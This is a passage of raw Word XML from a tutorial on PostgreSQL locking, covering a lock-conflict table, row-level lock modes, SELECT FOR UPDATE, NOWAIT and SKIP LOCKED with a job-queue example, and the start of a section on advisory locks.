        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD59E3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SRE    ✓    ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6E4E34" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  E      ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BAFABA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  AE     </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431A99A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="304478B3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Row-level locks (held for statement or transaction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD73954" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  FOR UPDATE:         exclusive row lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF1E3C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Prevents: other transactions from locking (FOR UPDATE/SHARE) or modifying row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7D204" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Use: "I intend to modify this row, prevent concurrent modification"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840C4B6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C74B1E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  FOR NO KEY UPDATE:  exclusive but allows FK references to still read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23997EF0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A78A23" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  FOR SHARE:          shared row lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006B4F77" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Prevents: other transactions from modifying row (but not reading)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4272D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Allows: multiple transactions to hold FOR SHARE simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFC3DC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Use: "I'm reading this row and don't want it to change while I decide"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139C473" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403232D7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  FOR KEY SHARE:      weakest — only prevents modifications of key columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D52B62" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Use: FK checks (ensure referenced row isn't deleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE412A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="0B46DE0C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>SELECT FOR UPDATE — the correct way to read-then-modify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C13A84" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EEB0B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE69B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SELECT balance → 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AA0BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    (gap here — another transaction can modify)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07657E41" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    UPDATE balance = 1000 - 100 = 900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9464C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    (lost update risk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FAC4C7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5BC0BD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFDE035" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SELECT balance FROM accounts WHERE id = 1 FOR UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F5161" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Acquires exclusive row lock immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31E775" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Other transactions cannot modify this row until lock released</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28893897" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Lock held until COMMIT or ROLLBACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334CBE77" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2233AB42" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    UPDATE accounts SET balance = balance - 100 WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333DB627" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Safe: no one else can have modified balance since our SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6181D254" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6ECA64" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  NOWAIT: fail immediately if lock not available (instead of waiting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51572B0E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SELECT ... FOR UPDATE NOWAIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B91ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → ERROR: could not obtain lock on row in relation "accounts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA02C4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Application can retry immediately or try different approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0918F5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F3D4E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SKIP LOCKED: skip rows that are locked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFAC0E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    SELECT ... FOR UPDATE SKIP LOCKED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3868834E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Returns only unlocked rows (skips locked ones without waiting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C822898" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Use: work queue processing (each worker takes unlocked job)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C2037" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CC562" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    -- Atomic job claiming (no two workers claim same job):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D0D8D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    WITH claimed AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DC8F7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      SELECT id FROM jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B539767" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      WHERE status = 'pending'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E424EE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      ORDER BY priority DESC, created_at ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B69A87C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      LIMIT 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7177B7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      FOR UPDATE SKIP LOCKED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A52B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1408E7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    UPDATE jobs SET status = 'processing', worker_id = $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA65844" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    WHERE id = (SELECT id FROM claimed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4194F415" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    RETURNING *;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A649922" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5053561D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Worker A executes this: claims job 1 (locked), skips already-locked jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B692F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Worker B executes concurrently: SKIP LOCKED skips job 1, claims job 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9EF0F6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    No collision, no waiting, fully concurrent work queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728EF2BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="71035A02" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Advisory locks — application-level locks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0E9A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Acquire/release locks manually (not tied to table rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403066F0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Integers as lock keys (application defines meaning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE9D2AA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7443968D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Lock user account for processing (prevent concurrent processing):</w:t>
      </w:r>
    </w:p>
